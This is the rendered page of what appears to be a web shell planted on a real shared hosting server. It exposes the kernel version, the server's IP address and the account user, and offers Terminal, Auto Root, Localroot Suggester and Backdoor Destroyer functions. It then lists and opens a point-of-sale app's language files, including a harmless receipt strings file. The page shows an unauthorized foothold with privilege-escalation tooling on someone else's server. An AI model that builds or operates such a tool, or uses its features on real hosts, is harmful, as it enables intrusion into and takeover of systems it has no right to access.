Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
ap.tsgbd.com /
aa /
lang /
ro /
Delete
Unzip
Name
Size
Permission
Date
Action
account.php
2.07
KB
-rw-r--r--
2025-02-06 04:37
auth.php
637
B
-rw-r--r--
2025-02-06 04:37
barcode.php
2.17
KB
-rw-r--r--
2025-02-06 04:37
brand.php
757
B
-rw-r--r--
2025-02-06 04:37
business.php
3.92
KB
-rw-r--r--
2025-02-06 04:37
cash_register.php
1.31
KB
-rw-r--r--
2025-02-06 04:37
category.php
914
B
-rw-r--r--
2025-02-06 04:37
contact.php
1.57
KB
-rw-r--r--
2025-02-06 04:37
expense.php
1.47
KB
-rw-r--r--
2025-02-06 04:37
home.php
1019
B
-rw-r--r--
2025-02-06 04:37
invoice.php
2.75
KB
-rw-r--r--
2025-02-06 04:37
lang_v1.php
84.32
KB
-rw-r--r--
2025-02-06 04:37
messages.php
1.77
KB
-rw-r--r--
2025-02-06 04:37
pagination.php
537
B
-rw-r--r--
2025-02-06 04:37
passwords.php
786
B
-rw-r--r--
2025-02-06 04:37
printer.php
1.06
KB
-rw-r--r--
2025-02-06 04:37
product.php
2.46
KB
-rw-r--r--
2025-02-06 04:37
purchase.php
2.73
KB
-rw-r--r--
2025-02-06 04:37
receipt.php
869
B
-rw-r--r--
2025-02-06 04:37
report.php
3.07
KB
-rw-r--r--
2025-02-06 04:37
restaurant.php
4.26
KB
-rw-r--r--
2025-02-06 04:37
role.php
3.19
KB
-rw-r--r--
2025-02-06 04:37
sale.php
2.37
KB
-rw-r--r--
2025-02-06 04:37
stock_adjustment.php
1.08
KB
-rw-r--r--
2025-02-06 04:37
tax_rate.php
1.08
KB
-rw-r--r--
2025-02-06 04:37
tooltip.php
7.5
KB
-rw-r--r--
2025-02-06 04:37
unit.php
745
B
-rw-r--r--
2025-02-06 04:37
user.php
1.52
KB
-rw-r--r--
2025-02-06 04:37
validation.php
5.95
KB
-rw-r--r--
2025-02-06 04:37
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Receipt Language Lines |-------------------------------------------------------------------------- | | The following language lines are used in receipt | */ 'product' => 'Product', 'qty' => 'Quantity', 'unit_price' => 'Unit Price', 'subtotal' => 'Subtotal', 'discount' => 'Discount', 'tax' => 'Tax', 'total' => 'Total', 'invoice_number' => 'Invoice No.', 'date' => 'Date', 'receipt_settings' => 'Receipt Settings', 'receipt_settings_mgs' => 'All receipt related settings for this location', 'print_receipt_on_invoice' => 'Auto print invoice after finalizing', 'receipt_printer_type' => 'Receipt Printer Type', 'receipt_settings_updated' => 'Receipt Setting updated succesfully', ];